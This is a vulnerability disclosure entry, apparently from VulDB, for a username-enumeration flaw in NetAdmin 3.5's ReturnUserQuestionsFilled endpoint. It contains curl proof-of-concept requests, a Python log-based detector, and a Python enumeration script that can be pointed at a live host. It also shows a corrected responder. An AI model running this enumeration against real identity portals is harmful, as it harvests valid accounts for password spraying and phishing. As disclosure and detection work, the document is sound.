| Title | NetAdmin Software NetAdmin 3.5 Username Enumeration |
|---|
| Description | Description: A user enumeration vulnerability was identified in the NetAdmin application by NetAdmin Software. The vulnerability exists in the /controller/api/Answer/ReturnUserQuestionsFilled endpoint, which allows Active Directory user enumeration without any protection. An attacker can send HTTP POST requests to this endpoint with a username in the JSON request body, in DOMAIN\user form (the backslash is JSON-escaped in the requests below). When the username exists, the application responds with HTTP 200 and the body {"data":[{"Message":"No questions have been answered yet","Status":"0"}]}. When the username does not exist, the application responds with HTTP 500 and the body {"Message":"An error has occurred."}. Because the status code alone distinguishes the two cases, the check is trivial to script against a wordlist, allowing an attacker to efficiently confirm which Active Directory accounts exist.
The absence of protections such as CAPTCHA or rate limiting means the check can be fully automated, and the resulting list of valid accounts feeds brute-force or password-spraying attacks, increasing the risk of a wider compromise.
Impact: This vulnerability allows unrestricted enumeration of Active Directory users, which can be exploited by attackers to obtain a valid list of user accounts. This type of attack may serve as the starting point for more harmful actions, such as brute-force or targeted spear-phishing attacks.
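Because the endpoint has no rate limiting, an enumeration run is visible in the web tier's access logs as one client firing many POSTs at the route in a short window, most of them answered with HTTP 500. The detection below is an added example for this advisory, not code from NetAdmin Software or the submitter; it assumes a combined-style access log with the timestamp in brackets, a 60-second window and the thresholds shown, and the sample log it runs over is constructed.

```python
"""Detect account enumeration against ReturnUserQuestionsFilled from access
logs: one client sending many POSTs to the endpoint in a short window, most
of them answered with HTTP 500, is a wordlist run, not a user who forgot
their security questions.

Added example, not from the advisory. Assumptions: a combined-style access
log with the timestamp in brackets, a 60-second window and the thresholds
below. The sample log is constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

ENDPOINT = "/controller/api/Answer/ReturnUserQuestionsFilled"
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Assumed format: <ip> - - [<timestamp>] "<method> <path> <proto>" <status> <bytes>
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)


def parse_line(line):
    """Return (ip, timestamp, method, path, status), or None for lines the
    regex does not match (other log formats, truncated lines)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return (m["ip"], datetime.strptime(m["ts"], TS_FMT), m["method"],
            m["path"], int(m["status"]))


def find_enumerators(lines, window=timedelta(seconds=60),
                     min_requests=20, min_error_ratio=0.5):
    """Per client IP, find the densest `window` of POSTs to ENDPOINT and
    flag the IP when that window holds at least `min_requests` requests of
    which at least `min_error_ratio` were HTTP 500 (unknown usernames)."""
    events = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev and ev[2] == "POST" and ev[3] == ENDPOINT:
            events[ev[0]].append((ev[1], ev[4]))

    flagged = {}
    for ip, evs in events.items():
        evs.sort()
        start, errors, best = 0, 0, (0, 0)
        for end, (ts, status) in enumerate(evs):
            errors += int(status == 500)
            while ts - evs[start][0] > window:   # slide the window forward
                errors -= int(evs[start][1] == 500)
                start += 1
            if end - start + 1 > best[0]:
                best = (end - start + 1, errors)
        n, e = best
        if n >= min_requests and e / n >= min_error_ratio:
            flagged[ip] = {"requests": n, "errors": e}
    return flagged


# ---- constructed sample log (not real traffic) --------------------------
_BRT = timezone(timedelta(hours=-3))
_T0 = datetime(2024, 9, 25, 16, 40, 1, tzinfo=_BRT)


def _log_line(ip, t, status, method="POST", path=ENDPOINT):
    return f'{ip} - - [{t.strftime(TS_FMT)}] "{method} {path} HTTP/1.1" {status} 41'


SAMPLE_LOG = (
    # enumeration: 30 POSTs in 45 s, 26 of them for names that do not exist
    [_log_line("203.0.113.7", _T0 + timedelta(seconds=1.5 * i),
               200 if i in (0, 7, 19, 28) else 500) for i in range(30)]
    # a real user: one typo, then the right username, minutes apart
    + [_log_line("198.51.100.5", _T0 + timedelta(minutes=2), 500),
       _log_line("198.51.100.5", _T0 + timedelta(minutes=3), 200)]
    # unrelated traffic to another path is ignored entirely
    + [_log_line("192.0.2.9", _T0 + timedelta(seconds=i), 200, "GET", "/login")
       for i in range(25)]
)

if __name__ == "__main__":
    for ip, stats in find_enumerators(SAMPLE_LOG).items():
        print(f"{ip}: {stats['requests']} POSTs, {stats['errors']} x HTTP 500 in 60 s")
```

The thresholds are the tuning knob: with `min_requests=2` the legitimate user who mistyped their name once is flagged too, so pick a floor that reflects how often a real person retries this form, and treat the error ratio as the stronger signal. Once the discrepancy is fixed server-side the 500s disappear and the rule degrades to a plain request-rate alert, which is still worth keeping on an identity portal.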
Affected Path:
Vulnerable route: /controller/api/Answer/ReturnUserQuestionsFilled
Request for Existing User:
curl -i 'https://netadminportal.site.com.br/controller/api/Answer/ReturnUserQuestionsFilled' \
-X POST \
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0' \
-H 'Accept: application/json, text/plain, */*' \
-H 'Content-Type: application/json;charset=utf-8' \
--data-raw '{"username":"domain.com.br\\teste"}'
Response:
{
"data": [
{
"Message": "No questions have been answered yet",
"Status": "0"
}
]
}
Request for Non-Existent User:
curl -i 'https://netadminportal.site.com.br/controller/api/Answer/ReturnUserQuestionsFilled' \
-X POST \
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0' \
-H 'Accept: application/json, text/plain, */*' \
-H 'Content-Type: application/json;charset=utf-8' \
--data-raw '{"username":"domain.com.br\\invalidUser"}'
Response:
{
"Message": "An error has occurred."
}
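The request pair above turned into a wordlist check, as an added example that is not part of the advisory or of NetAdmin's code. The responder `fake_netadmin` is a constructed stand-in that reproduces the two responses quoted above so the script runs offline, and `fixed_netadmin` shows the corrected behaviour (one response shape whether or not the account exists); the domain, the wordlist, the directory of "existing" accounts and the `http_send` helper are all assumptions.

```python
"""Enumerate usernames through the 200-vs-500 response discrepancy
described above, and show that a uniform response closes the oracle.

The HTTP transport is injected so the example runs offline: `fake_netadmin`
is a constructed stand-in mimicking the two responses quoted in the
advisory; it is not NetAdmin code. `http_send` is the only part you would
point at a live target, and only with authorisation.
"""
import json
import time
from typing import Callable, Iterable

ENDPOINT = "/controller/api/Answer/ReturnUserQuestionsFilled"
DOMAIN = "domain.com.br"  # placeholder domain taken from the advisory's requests

# Constructed directory for the fake backend (assumption: these are the
# only accounts that exist).
_FAKE_DIRECTORY = {"teste", "alice", "bob"}


def fake_netadmin(username: str) -> tuple[int, str]:
    """Constructed responder reproducing the behaviour quoted above:
    HTTP 200 with the 'no questions' payload for an existing AD user,
    HTTP 500 with the generic error for anyone else."""
    _, _, sam = username.rpartition("\\")
    if sam in _FAKE_DIRECTORY:
        return 200, json.dumps({"data": [{"Message": "No questions have been answered yet",
                                         "Status": "0"}]})
    return 500, json.dumps({"Message": "An error has occurred."})


def fixed_netadmin(username: str) -> tuple[int, str]:
    """Same endpoint with the discrepancy removed: every username, valid or
    not, gets the identical status and body, so the response carries no
    information about account existence."""
    return 200, json.dumps({"data": [{"Message": "No questions have been answered yet",
                                     "Status": "0"}]})


def probe_users(candidates: Iterable[str],
                send: Callable[[str], tuple[int, str]],
                delay: float = 0.0) -> dict[str, list[str]]:
    """Classify candidates by the observable discrepancy.

    `send(username)` must return (status_code, body). A 200 is recorded as
    'exists', a 500 as 'absent', anything else as 'unknown' so a WAF block
    or an outage is not silently miscounted as a result. `delay` sleeps
    between requests; the advisory notes there is no rate limiting, but a
    tester still wants to avoid hammering a production identity portal.
    """
    result = {"exists": [], "absent": [], "unknown": []}
    for name in candidates:
        status, _body = send(f"{DOMAIN}\\{name}")
        if status == 200:
            result["exists"].append(name)
        elif status == 500:
            result["absent"].append(name)
        else:
            result["unknown"].append(name)
        if delay:
            time.sleep(delay)
    return result


def http_send(base_url: str):
    """Build a real `send` for `probe_users` against a live host (assumed
    base URL, e.g. https://netadminportal.example). Requires `requests`."""
    import requests  # imported lazily so the offline example has no dependency

    def send(username: str) -> tuple[int, str]:
        r = requests.post(base_url + ENDPOINT,
                          json={"username": username},
                          headers={"Accept": "application/json, text/plain, */*"},
                          timeout=10)
        return r.status_code, r.text
    return send


if __name__ == "__main__":
    wordlist = ["teste", "invalidUser", "alice", "svc_backup"]
    print("vulnerable:", probe_users(wordlist, fake_netadmin))
    print("fixed:     ", probe_users(wordlist, fixed_netadmin))
```

Against `fixed_netadmin` the probe reports every candidate as "exists", which is the same as learning nothing. A real fix has to go further than matching the status code and body: the server-side work (and therefore the response time) must be the same for both cases, and rate limiting on the endpoint belongs there regardless, since the 200/500 split is only the most obvious oracle.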
Vulnerability Classification:
CWE-203: Observable Discrepancy
CWE-204: Observable Response Discrepancy
CWE-200: Exposure of Sensitive Information to an Unauthorized Actor |
|---|
| Source | ⚠️ https://netadmin.software/gestao-de-identidade-e-acesso/ |
|---|
| User | tristao (UID 75382) |
|---|
| Submission | 09/25/2024 16:49 (2 years ago) |
|---|
| Moderation | 10/04/2024 08:40 (9 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 279212 [Netadmin Software NetAdmin IAM up to 3.5 HTTP POST Request ReturnUserQuestionsFilled Username information exposure] |
|---|
| Points | 20 |
|---|